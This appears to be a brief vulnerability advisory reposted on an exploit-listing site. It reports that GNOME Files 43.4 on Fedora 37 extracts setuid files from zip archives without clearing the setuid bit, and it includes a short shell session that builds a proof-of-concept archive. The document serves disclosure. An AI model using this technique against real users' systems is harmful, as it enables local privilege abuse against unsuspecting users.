Share
## https://sploitus.com/exploit?id=PACKETSTORM:174064
Affected: GNOME Files 43.4 (nautilus) on fedora 37  
  
Description:  
  
If an user A opens in GNOME files zip archive containing  
`setuid` file F, then F will be silently extracted to  
a subdirectory of CWD.  
  
If F is accessible by hostile local user B and B executes F,  
then F will be executed as from user A.  
  
tar(1) and unzip(1) are not vulnerable to this attack.  
  
Session for creating the ZIP.  
After that just open f.zip in GNOME files.  
<pre>  
[joro@fedora ~]$ umask  
0022  
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F  
[joro@fedora 2]$ zip f F ; zipinfo f  
Archive: f.zip  
Zip file size: 155 bytes, number of entries: 1  
-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F  
[joro@fedora 2]$ ls -ld /tmp/2/  
drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/  
[joro@fedora 2]$  
</pre>